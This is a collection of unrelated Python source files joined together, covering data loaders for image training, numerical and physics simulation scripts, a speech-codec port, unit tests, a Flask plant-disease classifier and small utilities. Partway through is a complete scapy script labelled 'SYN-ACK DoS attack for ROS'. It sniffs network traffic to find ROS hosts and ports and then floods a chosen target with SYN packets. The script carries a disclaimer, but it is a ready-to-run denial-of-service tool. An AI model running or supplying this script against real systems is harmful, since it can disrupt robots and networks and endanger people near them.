random_area=[0.08, 1.0],
num_attempts=100)
self.res = ops.Resize(device=dali_device, resize_x=crop,\
resize_y=crop, interp_type=types.INTERP_TRIANGULAR)
self.cmnp = ops.CropMirrorNormalize(device = "gpu",
output_dtype = types.FLOAT,
output_layout = types.NCHW,
crop = (crop, crop),
image_type = types.RGB,
mean = [0.485 * 255,0.456 * 255,0.406 * 255],
std = [0.229 * 255,0.224 * 255,0.225 * 255])
self.coin = ops.CoinFlip(probability = 0.5)
def define_graph(self):
"""
Define graph function
:return: (output, labels): images of data, and labels of data
"""
rng = self.coin()
self.jpegs, self.labels = self.input(name = "Reader")
images = self.decode(self.jpegs)
images = self.res(images)
output = self.cmnp(images.gpu(), mirror = rng)
return [output, self.labels]
class HybridValPipe(Pipeline):
"""
Pipeline for validation
"""
def __init__(self, batch_size, num_threads, device_id, data_dir, crop, size):
'''
Init function for validation pipeline
:param batch_size: batch size for training
:param num_threads: number of threads to use
:param device_id: device id
:param data_dir: name of data directory
:param crop: shape of cropped image
:param size: size of images
'''
super(HybridValPipe, self).__init__(batch_size, num_threads,\
device_id, seed = 12 + device_id)
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
self.input = ops.FileReader(
file_root = data_dir,
shard_id = local_rank,
num_shards = world_size,
random_shuffle = False)
self.decode = ops.ImageDecoder(device = "mixed", output_type = types.RGB)
self.res = ops.Resize(device = "gpu", resize_shorter = size)
self.cmnp = ops.CropMirrorNormalize(device = "gpu",
output_dtype = types.FLOAT,
output_layout = types.NCHW,
crop = (crop, crop),
image_type = types.RGB,
mean = [0.485 * 255,0.456 * 255,0.406 * 255],
std = [0.229 * 255,0.224 * 255,0.225 * 255])
def define_graph(self):
"""
Define graph function
:return: (output, labels): images of data, and labels of data
"""
self.jpegs, self.labels = self.input(name = "Reader")
images = self.decode(self.jpegs)
images = self.res(images)
output = self.cmnp(images)
return [output, self.labels]
class DALIWrapper:
"""
Wrapper Class
"""
def gen_wrapper(dalipipeline):
"""
generate wrapper function
:param dalipipeline: dali pipeline
"""
for data in dalipipeline:
input = data[0]["data"]
target = data[0]["label"].squeeze().cuda().long()
yield input, target
dalipipeline.reset()
def __init__(self, dalipipeline):
"""
Init function for initialization
"""
self.dalipipeline = dalipipeline
def __iter__(self):
"""
Iterator function
"""
return DALIWrapper.gen_wrapper(self.dalipipeline)
def get_dali_train_loader(dali_cpu=False):
"""
DALI train loader
:param dali_cpu: whether cpus is used
:return: gdtl: output of gdtl function
"""
def gdtl(data_path, batch_size, workers=5, _worker_init_fn=None):
"""
DALI train loader function
:param data_path: image data path
:param batch_size: batch size in training phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
        :return: (DALIWrapper(train_loader), int(pipe.epoch_size("Reader") / (world_size * batch_size))): wrapper of the train loader and the number of batches per epoch
"""
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
traindir = os.path.join(data_path, 'train')
pipe = HybridTrainPipe(batch_size=batch_size, num_threads=workers,
device_id = local_rank,
data_dir = traindir, crop = 224, dali_cpu=dali_cpu)
pipe.build()
train_loader = DALIClassificationIterator(pipe, size \
= int(pipe.epoch_size("Reader") / world_size))
return DALIWrapper(train_loader), \
int(pipe.epoch_size("Reader") / (world_size * batch_size))
return gdtl
def get_dali_val_loader():
"""
DALI valid loader
:return: gdvl: output of gdvl function
"""
def gdvl(data_path, batch_size, workers=5, _worker_init_fn=None):
"""
DALI valid loader function
:param data_path: image data path
:param batch_size: batch size in validation phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
        :return: (DALIWrapper(val_loader), int(pipe.epoch_size("Reader") / (world_size * batch_size))): wrapper of the validation loader and the number of batches per epoch
"""
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
valdir = os.path.join(data_path, 'val')
pipe = HybridValPipe(batch_size=batch_size, num_threads=workers,
device_id = local_rank,
data_dir = valdir,
crop = 224, size = 256)
pipe.build()
val_loader = DALIClassificationIterator(pipe, size \
= int(pipe.epoch_size("Reader") / world_size), fill_last_batch=False)
return DALIWrapper(val_loader), \
int(pipe.epoch_size("Reader") / (world_size * batch_size))
return gdvl
def fast_collate(batch):
"""
collate function
:param batch: batch images
:return: (tensor, targets): tensor for images, and labels of images
"""
imgs = [img[0] for img in batch]
targets = torch.tensor([target[1] for target in batch], dtype=torch.int64)
w = imgs[0].size[0]
h = imgs[0].size[1]
tensor = torch.zeros( (len(imgs), 3, h, w), dtype=torch.uint8 )
for i, img in enumerate(imgs):
nump_array = np.asarray(img, dtype=np.uint8)
if nump_array.ndim < 3:
nump_array = np.expand_dims(nump_array, axis=-1)
nump_array = np.rollaxis(nump_array, 2)
tensor[i] += torch.from_numpy(nump_array)
return tensor, targets
class PrefetchedWrapper:
"""
Prefetched Wrapper
"""
    def prefetched_loader(loader):
"""
Prefetched loader function
:param loader: loading data
:return: (tensor, targets): tensor for images, and labels of images
"""
mean = torch.tensor([0.485 * 255, 0.456 * 255, 0.406 * 255]).cuda().view(1,3,1,1)
std = torch.tensor([0.229 * 255, 0.224 * 255, 0.225 * 255]).cuda().view(1,3,1,1)
stream = torch.cuda.Stream()
first = True
for next_input, next_target in loader:
with torch.cuda.stream(stream):
next_input = next_input.cuda(non_blocking=True)
next_target = next_target.cuda(non_blocking=True)
next_input = next_input.float()
next_input = next_input.sub_(mean).div_(std)
if not first:
yield input, target
else:
first = False
torch.cuda.current_stream().wait_stream(stream)
input = next_input
target = next_target
yield input, target
def __init__(self, dataloader):
"""
Init function
:param dataloader: loading data
"""
self.dataloader = dataloader
self.epoch = 0
def __iter__(self):
"""
Iterator function
:return: PrefetchedWrapper.prefetched_loader(self.dataloader): wrapper of prefetched loader
"""
if (self.dataloader.sampler is not None and
isinstance(self.dataloader.sampler,
torch.utils.data.distributed.DistributedSampler)):
self.dataloader.sampler.set_epoch(self.epoch)
self.epoch += 1
return PrefetchedWrapper.prefetched_loader(self.dataloader)
def get_pytorch_train_loader(data_path, batch_size, workers=5, \
_worker_init_fn=None, input_size=224):
"""
train loader function
:param data_path: image data path
:param batch_size: batch size in training phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
:param input_size: image size
    :return: (PrefetchedWrapper(train_loader), len(train_loader)): prefetched wrapper of the training loader, and length of the training loader
"""
traindir = os.path.join(data_path, 'train')
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(input_size),
transforms.RandomHorizontalFlip(),
]))
if torch.distributed.is_initialized():
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, shuffle=(train_sampler is None),
num_workers=workers, worker_init_fn=_worker_init_fn, \
pin_memory=True, sampler=train_sampler, collate_fn=fast_collate)
return PrefetchedWrapper(train_loader), len(train_loader)
def get_pytorch_val_loader(data_path, batch_size, workers=5, _worker_init_fn=None, input_size=224):
"""
validation loader function
:param data_path: image data path
:param batch_size: batch size in training phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
:param input_size: image size
    :return: (PrefetchedWrapper(val_loader), len(val_loader)): prefetched wrapper of the validation loader, and length of the validation loader
"""
valdir = os.path.join(data_path, 'val')
val_dataset = datasets.ImageFolder(
valdir, transforms.Compose([
transforms.Resize(int(input_size / 0.875)),
transforms.CenterCrop(input_size),
]))
if torch.distributed.is_initialized():
val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset)
else:
val_sampler = None
val_loader = torch.utils.data.DataLoader(
val_dataset,
sampler=val_sampler,
batch_size=batch_size, shuffle=False,
num_workers=workers, worker_init_fn=_worker_init_fn, pin_memory=True,
collate_fn=fast_collate)
return PrefetchedWrapper(val_loader), len(val_loader)
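# Editor's sketch (not part of the original module) of how the PyTorch loaders above
# are typically wired together; the dataset path and batch size are placeholders, and
# a CUDA device is required because PrefetchedWrapper normalizes batches on the GPU.
if __name__ == "__main__":
    train_loader, train_batches = get_pytorch_train_loader("/path/to/imagenet", batch_size=64)
    val_loader, val_batches = get_pytorch_val_loader("/path/to/imagenet", batch_size=64)
    print("train batches:", train_batches, "val batches:", val_batches)
    for images, labels in train_loader:
        # images: normalized float32 CUDA tensor in NCHW layout; labels: int64 CUDA tensor
        print(images.shape, labels.shape)
        break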
|
#!/usr/bin/python3
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import pysgpp
import helper.basis
import helper.function
import helper.grid
f = "beale"
d = 2
p = 3
b = 1
ns = list(range(1, 8))
grids = [
helper.grid.SGppGrid("bSpline", d, p, b),
helper.grid.SGppGrid("notAKnotBSpline", d, p, b),
helper.grid.SGppGrid("modifiedBSpline", d, p),
helper.grid.SGppGrid("modifiedNotAKnotBSpline", d, p),
helper.grid.SGppGrid("bSplineNoBoundary", d, p),
helper.grid.SGppGrid("notAKnotBSpline", d, p, 100),
]
f = helper.function.SGppTestFunction(f, d)
fig = plt.figure()
#ax = fig.add_subplot(111, projection="3d")
ax = fig.gca()
XX0, XX1, XX = helper.grid.generateMeshGrid((100, 100))
Ns= np.zeros((len(grids), len(ns)))
errors = np.zeros((len(grids), len(ns)))
for q, grid in enumerate(grids):
basis1D = helper.basis.SGppBasis(grid.grid.getBasis())
basis = helper.basis.TensorProduct(basis1D, d)
for r, n in enumerate(ns):
grid.generateRegular(n)
X, L, I = grid.getPoints()
if q == 5:
K = np.any(L == 0, axis=1).nonzero()[0].tolist()
K = pysgpp.IndexList(K)
grid.grid.getStorage().deletePoints(K)
X, L, I = grid.getPoints()
fX = f.evaluate(X)
#fInterp = helper.function.Interpolant(basis, X, L, I, fX)
fInterp = helper.function.SGppInterpolant(grid.grid, fX)
YY = np.reshape(fInterp.evaluate(XX), XX0.shape)
#ax.plot_surface(XX0, XX1, YY)
errors[q, r] = f.computeRelativeL2Error(fInterp)
Ns[q, r] = X.shape[0]
for q, _ in enumerate(grids):
ax.plot(Ns[q,:], errors[q,:], ".-")
ax.set_xscale("log")
ax.set_yscale("log")
ax.legend([str(grid) for grid in grids])
plt.show()
|
from wtforms import Form, validators, StringField, FloatField
class DeviceDataCreateForm(Form):
device_token = StringField(
"Device Token", [validators.DataRequired(), validators.length(max=255)]
)
type = StringField("Type", [validators.DataRequired(), validators.length(max=255)])
value = FloatField("Value", [validators.DataRequired()])
|
import os
os.system("conan install . -g txt")
|
import logging
try:
import spynnaker7.pyNN as pyNN
except ImportError:
import spynnaker.pyNN as pyNN
logger = logging.getLogger(__file__)
class Retina(object):
def __init__(self, spike_times=None, label='retina', mode='offline'):
"""
Args:
spike_times: list of lists of lists for the spiking of each neuron in each population
label: label to distinguish between left and right SpikeSourceArray populations
mode: str, can be 'online' or 'offline' and decides whether the spiking is
from pre-recorded input (`spike_times`) or live input stream
"""
# NOTE: numpy is row-major so the first axis represents the pixel columns (vertical) i.e. fixed x-coordinate
# and the second the pixels within this column i.e. all y-coordinates
# here n_cols and n_rows stand for the column_populations and rows within this column (not numpy rows/columns!)
self.n_cols, self.n_rows = spike_times.shape[:2]
self.pixel_populations = []
self.label = label
if mode == 'offline':
self._init_spiketimes(spike_times)
else:
logger.error("Live input streaming is not supported yet. Provide a spike_times array instead.")
raise NotImplementedError
def _init_spiketimes(self, spike_times):
"""
Initialise the spiking times of an offline Retina SpikeSourceArray populations
Args:
spike_times: a list of lists of lists for the spiking times of all the neurons
Returns:
In-place method
"""
logger.info("Initialising {} SpikeSourceArray with resolution {}.".format(self.label, (self.n_cols,
self.n_rows)))
if spike_times is not None:
for col_id, col in enumerate(spike_times):
col_of_pixels = pyNN.Population(size=self.n_rows,
cellclass=pyNN.SpikeSourceArray,
cellparams={'spike_times': col},
label="{0}_{1}".format(self.label, col_id), structure=pyNN.Line())
self.pixel_populations.append(col_of_pixels)
def create_retina(spike_times=None, label='retina', mode='offline'):
"""
A wrapper around the Retina class.
Args:
spike_times: see Retina docstring
label: see Retina docstring
mode: see Retina docstring
Returns:
A list of SpikeSourceArray populations representing the retina pixel columns.
"""
retina = Retina(spike_times, label, mode)
return retina.pixel_populations
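# Hedged usage sketch (illustrative only): building a tiny offline retina from
# pre-recorded spike times. The 2x2 resolution and spike-time values are made
# up, and pyNN.setup() is assumed to have been called by the surrounding script.
# import numpy as np
# spikes = np.empty((2, 2), dtype=object)
# spikes[0, 0], spikes[0, 1] = [1.0, 5.0], [2.0]
# spikes[1, 0], spikes[1, 1] = [3.0], [4.0, 6.0]
# left_columns = create_retina(spikes, label='retina_left', mode='offline')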
|
from basic_op import *
from oper_32b import *
from ld8a import *
from tab_ld8a import *
from typing import List
def Lsp_Az(lsp: List[int], a: List[int], aOffset: int) -> None:
"""
# (i) Q15 : line spectral frequencies
# (o) Q12 : predictor coefficients (order = 10)
"""
f1 = [0] * 6
f2 = [0] * 6
    Get_lsp_pol(lsp, 0, f1)
    Get_lsp_pol(lsp, 1, f2)
for i in range(5, 0, -1):
f1[i] = L_add(f1[i], f1[i - 1]) # f1[i] += f1[i-1]
f2[i] = L_sub(f2[i], f2[i - 1]) # f2[i] -= f2[i-1]
a[0 + aOffset] = 4096
j = 10
for i in range(1, 6):
t0 = L_add(f1[i], f2[i]) # f1[i] + f2[i]
# from Q24 to Q12 and * 0.5
        a[i + aOffset] = extract_l(L_shr_r(t0, 13))
t0 = L_sub(f1[i], f2[i]) # f1[i] - f2[i]
# from Q24 to Q12 and * 0.5
a[j + aOffset] = extract_l(L_shr_r(t0, 13))
j = j - 1
def Get_lsp_pol(lsp: List[int], lspIndexOffset: int, f: List[int]) -> None:
"""
lsp[] : line spectral freq. (cosine domain) in Q15
f[] : the coefficients of F1 or F2 in Q24
"""
lspIndex = 0 + lspIndexOffset
fIndex = 0
# All computation in Q24
f[fIndex] = L_mult(4096, 2048) # f[0] = 1.0 in Q24
fIndex = fIndex + 1
f[fIndex] = L_msu(0, lsp[lspIndex], 512) # f[1] = -2.0 * lsp[0] in Q24
fIndex = fIndex + 1
lspIndex = lspIndex + 2 # Advance lsp pointer
for i in range(2, 6):
f[fIndex] = f[fIndex-2]
for j in range(1, i):
hi, lo = L_Extract(f[fIndex-1])
t0 = Mpy_32_16(hi, lo, lsp[lspIndex]) # t0 = f[-1] * lsp
t0 = L_shl(t0, 1)
            f[fIndex] = L_add(f[fIndex], f[fIndex - 2])  # *f += f[-2]
            f[fIndex] = L_sub(f[fIndex], t0)  # *f -= t0
fIndex = fIndex - 1
f[fIndex] = L_msu(f[fIndex], lsp[lspIndex], 512) # *f -= lsp<<9
fIndex = fIndex + i # Advance f pointer
# Advance lsp pointer
lspIndex = lspIndex + 2
def Lsf_lsp(lsf: List[int], lsp: List[int], m: int) -> None:
"""
# (i) Q15 : lsf[m] normalized (range: 0.0<=val<=0.5)
# (o) Q15 : lsp[m] (range: -1<=val<1)
# (i) : LPC order
"""
for i in range(0, m):
ind = shr(lsf[i], 8) # ind = b8-b15 of lsf[i]
offset = lsf[i] & 0x00ff # offset = b0-b7 of lsf[i]
# lsp[i] = table[ind]+ ((table[ind+1]-table[ind])*offset) / 256
L_tmp = L_mult(sub(table[ind + 1], table[ind]), offset)
lsp[i] = add(table[ind], extract_l(L_shr(L_tmp, 9)))
def Lsp_lsf(lsp: List[int], lsf: List[int], m: int) -> None:
"""
# (i) Q15 : lsp[m] (range: -1<=val<1)
# (o) Q15 : lsf[m] normalized (range: 0.0<=val<=0.5)
# (i) : LPC order
"""
ind = 63 # begin at end of table -1
for i in range(m - 1, -1, -1):
# find value in table that is just greater than lsp[i]
while sub(table[ind], lsp[i]) < 0:
ind = sub(ind, 1)
# acos(lsp[i])= ind*256 + ( ( lsp[i]-table[ind] ) * slope[ind] )/4096
L_tmp = L_mult(sub(lsp[i], table[ind]), slope[ind])
tmp = round(L_shl(L_tmp, 3)) # (lsp[i]-table[ind])*slope[ind])>>12
lsf[i] = add(tmp, shl(ind, 8))
def Lsf_lsp2(lsf: List[int], lsp: List[int], m: int) -> None:
"""
# (i) Q13 : lsf[m] (range: 0.0<=val<PI)
# (o) Q15 : lsp[m] (range: -1<=val<1)
# (i) : LPC order
"""
for i in range(0, m):
# freq = abs_s(freq)
freq = mult(lsf[i], 20861) # 20861: 1.0/(2.0*PI) in Q17
ind = shr(freq, 8) # ind = b8-b15 of freq
offset = freq & 0x00ff # offset = b0-b7 of freq
if sub(ind, 63) > 0:
ind = 63 # 0 <= ind <= 63
# lsp[i] = table2[ind]+ (slope_cos[ind]*offset >> 12)
L_tmp = L_mult(slope_cos[ind], offset) # L_tmp in Q28
lsp[i] = add(table2[ind], extract_l(L_shr(L_tmp, 13)))
def Lsp_lsf2(lsp: List[int], lsf: List[int], m: int) -> None:
"""
# (i) Q15 : lsp[m] (range: -1<=val<1)
# (o) Q13 : lsf[m] (range: 0.0<=val<PI)
# (i) : LPC order
"""
ind = 63 # begin at end of table2 -1
for i in range(m - 1, -1, -1):
# find value in table2 that is just greater than lsp[i]
while sub(table2[ind], lsp[i]) < 0:
ind = sub(ind, 1)
if ind <= 0:
break
offset = sub(lsp[i], table2[ind])
# acos(lsp[i])= ind*512 + (slope_acos[ind]*offset >> 11)
L_tmp = L_mult(slope_acos[ind], offset) # L_tmp in Q28
freq = add(shl(ind, 9), extract_l(L_shr(L_tmp, 12)))
lsf[i] = mult(freq, 25736) # 25736: 2.0*PI in Q12
def Weight_Az(a: List[int], gamma: int, m: int, ap: List[int]) -> None:
"""
(i) Q12 : a[m+1] LPC coefficients
(i) Q15 : Spectral expansion factor.
(i) : LPC order.
(o) Q12 : Spectral expanded LPC coefficients
"""
ap[0] = a[0]
fac = gamma
for i in range(1, m):
ap[i] = round(L_mult(a[i], fac))
fac = round(L_mult(fac, gamma))
ap[m] = round(L_mult(a[m], fac))
def Weight_Az_2(a: List[int], gamma: int, m: int) -> List[int]:
"""
# (i) Q12 : a[m+1] LPC coefficients
# (i) Q15 : Spectral expansion factor.
# (i) : LPC order.
# (o) Q12 : Spectral expanded LPC coefficients
"""
    result = [0] * (m + 1)
result[0] = a[0]
fac = gamma
for i in range(1, m):
result[i] = round(L_mult(a[i], fac))
fac = round(L_mult(fac, gamma))
    result[m] = round(L_mult(a[m], fac))
    return result
def Int_qlpc(lsp_old: List[int], lsp_new: List[int], Az: List[int]) -> None:
"""
# input : LSP vector of past frame
# input : LSP vector of present frame
# output: interpolated Az() for the 2 subframes
"""
lsp = [0] * M
# lsp[i] = lsp_new[i] * 0.5 + lsp_old[i] * 0.5
for i in range(0, M):
lsp[i] = add(shr(lsp_new[i], 1), shr(lsp_old[i], 1))
Lsp_Az(lsp, Az, 0) # Subframe 1
Lsp_Az(lsp_new, Az, MP1) # Subframe 2
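# Hedged usage sketch (illustrative only, not part of the original module):
# Lsf_lsp and Lsp_lsf are approximate inverses, so converting Q15 LSFs to the
# cosine domain and back should roughly recover the input. The sample values
# below are made up for illustration.
# lsf_in = [1000 * (i + 1) for i in range(10)]   # fictitious Q15 LSFs
# lsp_tmp = [0] * 10
# lsf_out = [0] * 10
# Lsf_lsp(lsf_in, lsp_tmp, 10)
# Lsp_lsf(lsp_tmp, lsf_out, 10)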
|
"""Unit tests for runner_impl.py."""
import unittest
import numpy
from deep_learning.engine import q_base
from deep_learning.engine import qfunc_impl
from deep_learning.engine import runner_impl
class ExperienceReplayRunnerTest(unittest.TestCase):
def test_memoryManagement(self):
qfunc = qfunc_impl.RandomValueQFunction(action_space_size=2)
runner = runner_impl.ExperienceReplayRunner(
experience_capacity=1,
experience_sample_batch_size=1,
train_every_n_steps=1)
tran1 = q_base.Transition(
s=numpy.array([[1, 2]]),
a=numpy.array([[1, 0]]),
r=1,
sp=numpy.array([[3, 4]]))
tran2 = q_base.Transition(
s=numpy.array([[3, 4]]),
a=numpy.array([[0, 1]]),
r=1,
sp=numpy.array([[5, 6]]))
runner._protected_ProcessTransition(qfunc, tran1, 0)
runner._protected_ProcessTransition(qfunc, tran2, 1)
hist = runner._experience._history
self.assertEqual(1, len(hist))
self.assertEqual(tran2, hist[0])
|
"""
SYN-ACK DoS attack for ROS
DISCLAIMER: Use against your own hosts only! By no means do I encourage or promote unauthorized tampering with running robotic systems. This can cause serious human harm and material
damage.
"""
import sys
from scapy.all import *
from operator import itemgetter
from scapy.contrib.tcpros import *
bind_layers(TCP, TCPROS)
bind_layers(HTTPRequest, XMLRPC)
bind_layers(HTTPResponse, XMLRPC)
print("Capturing network traffic...")
packages = sniff(iface="eth0", filter="tcp", count=20)
targets = {}
for p in packages[TCPROSBody]:
# Filter by ip
# if p[IP].src == "12.0.0.2":
port = p.sport
ip = p[IP].src
if ip in targets.keys():
targets[ip].append(port)
else:
targets[ip] = [port]
# Get unique values:
for t in targets.keys():
targets[t] = list(set(targets[t]))
# Select one of the targets
dst_target = list(map(itemgetter(0), targets.items()))[0]
dport_target = targets[dst_target]
# Small fix to meet scapy syntax on "dport" key
# if single value, can't go as a list
if len(dport_target) < 2:
dport_target = dport_target[0]
p = (
IP(dst=dst_target, id=1111, ttl=99)
/ TCP(
sport=RandShort(),
dport=dport_target,
seq=1232345,
ack=10000,
window=10000,
flags="S",
)
/ "SYN Flood DoS"
)
ls(p)
ans, unans = srloop(p, inter=0.05, retry=2, timeout=4)
|
from hathor.wallet.resources.address import AddressResource
from hathor.wallet.resources.balance import BalanceResource
from hathor.wallet.resources.history import HistoryResource
from hathor.wallet.resources.lock import LockWalletResource
from hathor.wallet.resources.send_tokens import SendTokensResource
from hathor.wallet.resources.sign_tx import SignTxResource
from hathor.wallet.resources.state import StateWalletResource
from hathor.wallet.resources.unlock import UnlockWalletResource
__all__ = [
'BalanceResource',
'HistoryResource',
'AddressResource',
'SendTokensResource',
'UnlockWalletResource',
'LockWalletResource',
'StateWalletResource',
'SignTxResource',
]
|
import os
import sys
import json
# Flask
from flask import Flask, redirect, url_for, request, render_template, Response, jsonify, redirect
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
# TensorFlow and tf.keras
import tensorflow as tf
from tensorflow import keras
import tensorflow_hub as hub
from tensorflow.keras.applications.imagenet_utils import preprocess_input, decode_predictions
from tensorflow.keras.models import load_model, model_from_json
from tensorflow.keras.preprocessing import image
# Some utilites
import numpy as np
from datetime import date
import owncloud
import requests
import urllib
import cv2
# Declare a flask app
app = Flask(__name__)
with open('credentials.txt', 'r') as f:
    credentials = f.read()
username, password = credentials.split(' ')
def setup():
today = date.today()
oc = owncloud.Client('http://localhost/owncloud')
oc.login(username, password)
file = f'{today.day}-{today.month}/image.jpg'
link_info = oc.share_file_with_link(f'{file}')
url = link_info.get_link() + "/download"
link = link_info.get_link()[-15:]
link = f'http://localhost/owncloud/index.php/apps/files_sharing/ajax/publicpreview.php?x=1400&y=688&a=true&file=image.jpg&t={link}&scalingup=0'
return link
MODEL_PATH = 'models/tomato_model.h5'
MODEL_JSON = 'models/tomato_model.json'
model = load_model(MODEL_PATH, custom_objects={'KerasLayer':hub.KerasLayer})
model.summary()
classes = ['Tomato___Bacterial_spot' , 'Tomato___Septoria_leaf_spot',
'Tomato___Early_blight', 'Tomato___Spider_mites_Two-spotted_spider_mite',
'Tomato___healthy', 'Tomato___Target_Spot',
'Tomato___Late_blight', 'Tomato___Tomato_mosaic_virus',
'Tomato___Leaf_Mold', 'Tomato___Tomato_Yellow_Leaf_Curl_Virus']
def model_predict(img, model):
img = cv2.resize(img,(224,224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x, mode='tf')
preds = model.predict(x)
return preds
@app.route('/', methods=['GET'])
def index():
return render_template('index.html')
@app.route('/generic', methods=['GET'])
def predict():
today = date.today()
link = setup()
if not os.path.exists(f'{today.day}-{today.month}'):
os.mkdir(f'{today.day}-{today.month}')
# image = requests.get(link)
# with iopen(f'{today.day}-{today.month}/image.jpg', "wb") as file:
# file.write(image.content)
# img_path = os.path.join(f'{today.day}-{today.month}', 'image.jpg')
#with open(f'{today.day}-{today.month}/image.jpg', "rb") as file:
image = urllib.request.urlopen(link)
image = np.asarray(bytearray(image.read()), dtype="uint8")
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
print(image.shape)
preds = model_predict(image, model)
pred_class = classes[np.argmax(preds)]
result = pred_class.replace('_', ' ').capitalize()
return render_template('generic.html',user_image= link,response=json.dumps(result))
if __name__ == '__main__':
http_server = WSGIServer(('0.0.0.0', 5000), app)
http_server.serve_forever()
    # index() and predict() are served by the WSGI server above;
    # serve_forever() blocks, so direct calls placed here would never run.
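    # Hedged usage sketch (not part of the original app): once the server is
    # running, the prediction page defined above can be requested with e.g.
    #   curl http://localhost:5000/generic
    # assuming the owncloud setup in setup() has a fresh image for today.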
|
import logging
import os
from string import Template
import numpy as np
from dataforge import Meta
from phd.thunderstorm.convert_to_hdf5 import get_named_cylinder_readers, get_named_number_readers_1
from phd.utils.convertor_tools import theta_to_direction
from phd.utils.hdf5_tools import get_convertor
from phd.utils.run_tools import multirun_command, general_input_generator, create_gdml, dir_name_generator, \
values_from_dict, InputData
ROOT_PATH = os.path.dirname(__file__)
INPUT_TEMPLATE = """/df/project test
/df/gdml ${path}
/thunderstorm/physics standard_opt_4
/thunderstorm/stacking particle_cylinder
/thunderstorm/addParticleInPCS gamma
/thunderstorm/addParticleInPD e-
/thunderstorm/cut/energy ${cut}
/gps/particle e-
/gps/number 1
/gps/direction ${direction}
/gps/ene/mono ${energy} MeV
/gps/position 0. 0. 0. m
/run/beamOn ${number}
"""
def values_macros_gen(paths):
for path in paths:
for theta in np.arange(0, 91, 10):
for energy in np.arange(0.1, 3.01, 0.05):
if energy > 2 and theta > 55:
continue
values_macros = {
"path": path,
"cut": 0.05,
'number': 1,
'energy': energy,
'direction': theta_to_direction(np.deg2rad(theta)),
}
yield values_macros
def reverse_grid_input_generator(gdml_template_file: str, macros_template: str):
macros_template = Template(macros_template)
values_gdml = {
'height': [0],
'fieldValueZ': 1e-4 * np.arange(5.0, 10.1, 0.5),
}
paths, values_gdml = create_gdml(gdml_template_file, values_gdml)
paths = list(map(lambda x: os.path.join("..", x), paths))
for path, values in zip(
dir_name_generator(".", "sim"),
values_macros_gen(paths)
):
text = macros_template.substitute(values)
path_gdml = values["path"]
indx = paths.index(path_gdml)
input_data_meta = {
"macros": values,
"gdml": values_gdml[indx]
}
data = InputData(
text=text,
path=path,
values=Meta(input_data_meta)
)
yield data
def get_readers():
readers = []
txt = get_named_number_readers_1(["e-"], "particle_detector")
binReader = get_named_cylinder_readers(["e-"], "particle_detector")
readers = readers + txt + binReader
txt = get_named_number_readers_1(["gamma"], "particle_cylinder")
binReader = get_named_cylinder_readers(["gamma"], "particle_cylinder")
readers = readers + txt + binReader
return readers
def main():
logging.basicConfig(filename="run.log")
logging.root.setLevel(logging.DEBUG)
gdml_template = os.path.join(ROOT_PATH, "template", "reversed_electron.gdml")
input_data = reverse_grid_input_generator(gdml_template, INPUT_TEMPLATE)
command = "../../build/thunderstorm/geant4-thunderstorm.exe"
readers = get_readers()
multirun_command(input_data, command, post_processor=get_convertor(readers, "./result.hdf5", clear=False))
return 0
if __name__ == '__main__':
main()
|
import numpy as np
import scipy.sparse
import qutip
def shuffle_indices_scipy_csr(matrix):
"""
Given a scipy.sparse.csr_matrix, shuffle the indices within each row and
return a new array. This should represent the same matrix, but in the less
efficient, "unsorted" manner. All mathematical operations should still
work the same after this, but may be slower.
This is not guaranteed to change the order of the indices in every case.
If there is at most one value per row, there is no unsorted order. In
general, we attempt to shuffle, and if this returns the same order as
before, we just reverse it to ensure it's different.
"""
out = matrix.copy()
for row in range(out.shape[0]):
ptr = (out.indptr[row], out.indptr[row + 1])
if ptr[1] - ptr[0] > 1:
order = np.argsort(np.random.rand(ptr[1] - ptr[0]))
# If sorted, reverse it.
order = np.flip(order) if np.all(order[:-1] < order[1:]) else order
out.indices[ptr[0]:ptr[1]] = out.indices[ptr[0]:ptr[1]][order]
out.data[ptr[0]:ptr[1]] = out.data[ptr[0]:ptr[1]][order]
return out
def random_scipy_csr(shape, density, sorted_):
"""
Generate a random scipy CSR matrix with the given shape, nnz density, and
with indices that are either sorted or unsorted. The nnz elements will
always be at least one.
"""
nnz = int(shape[0] * shape[1] * density) or 1
data = np.random.rand(nnz) + 1j*np.random.rand(nnz)
rows = np.random.choice(np.arange(shape[0]), nnz)
cols = np.random.choice(np.arange(shape[1]), nnz)
sci = scipy.sparse.coo_matrix((data, (rows, cols)), shape=shape).tocsr()
if not sorted_:
        sci = shuffle_indices_scipy_csr(sci)  # returns a shuffled copy, so reassign
return sci
def random_numpy_dense(shape, fortran):
"""Generate a random numpy dense matrix with the given shape."""
out = np.random.rand(*shape) + 1j*np.random.rand(*shape)
if fortran:
out = np.asfortranarray(out)
return out
def random_csr(shape, density, sorted_):
"""
Generate a random qutip CSR matrix with the given shape, nnz density, and
with indices that are either sorted or unsorted. The nnz elements will
always be at least one (use data.csr.zeros otherwise).
"""
return qutip.core.data.CSR(random_scipy_csr(shape, density, sorted_))
def random_dense(shape, fortran):
"""Generate a random qutip Dense matrix of the given shape."""
return qutip.core.data.Dense(random_numpy_dense(shape, fortran))
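# Hedged usage sketch (illustrative only): these helpers are typically called
# from benchmark or test code, e.g.
# csr_unsorted = random_csr((16, 16), density=0.1, sorted_=False)
# dense_fortran = random_dense((16, 16), fortran=True)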
|
# coding=utf8
print 'Hello, World!'
|
from ievv_opensource.utils.desktopnotifications.base import AbstractNotification
class Notification(AbstractNotification):
def show_message(self, title, message):
pass
|
'''
Generally, when you have to deal with image, text, audio or video data, you can use
the standard Python packages that load the data into a numpy array, and then convert
that array into a torch.*Tensor.
